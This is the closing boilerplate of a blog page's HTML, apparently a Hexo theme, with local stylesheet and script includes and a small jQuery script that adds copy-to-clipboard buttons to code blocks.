        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
